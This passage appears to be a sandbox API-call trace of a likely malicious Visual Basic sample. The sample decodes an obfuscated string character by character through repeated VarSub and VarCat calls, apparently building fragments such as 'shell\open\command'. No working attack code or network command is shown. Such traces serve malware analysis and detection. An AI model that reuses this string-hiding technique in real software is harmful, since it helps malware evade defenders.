dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.728] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.729] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.730] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.730] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.731] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0172.731] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.732] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.732] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.733] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.733] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.734] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.734] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.735] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.735] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.736] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.736] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.737] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.737] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.738] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.738] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.739] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.739] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.740] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.740] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.741] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0172.741] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.741] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.742] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.742] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0172.743] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.743] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0172.744] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.744] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0172.744] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.745] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.745] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.746] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0172.746] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.747] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0172.747] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.747] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.748] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.748] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.749] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.749] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0172.749] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.750] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0172.750] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.750] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.751] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.751] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0172.751] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.752] VarSub (in: pvarLeft=0x28f950, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1168574, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.752] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f990, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.753] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.753] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.754] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0172.754] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.755] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.755] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.756] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.756] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.756] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.757] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.757] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.757] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.758] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.758] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.759] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.759] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.760] VarSub (in: pvarLeft=0x28f9f0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.760] VarCat (in: pvarLeft=0x28f840, pvarRight=0x28fa50, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 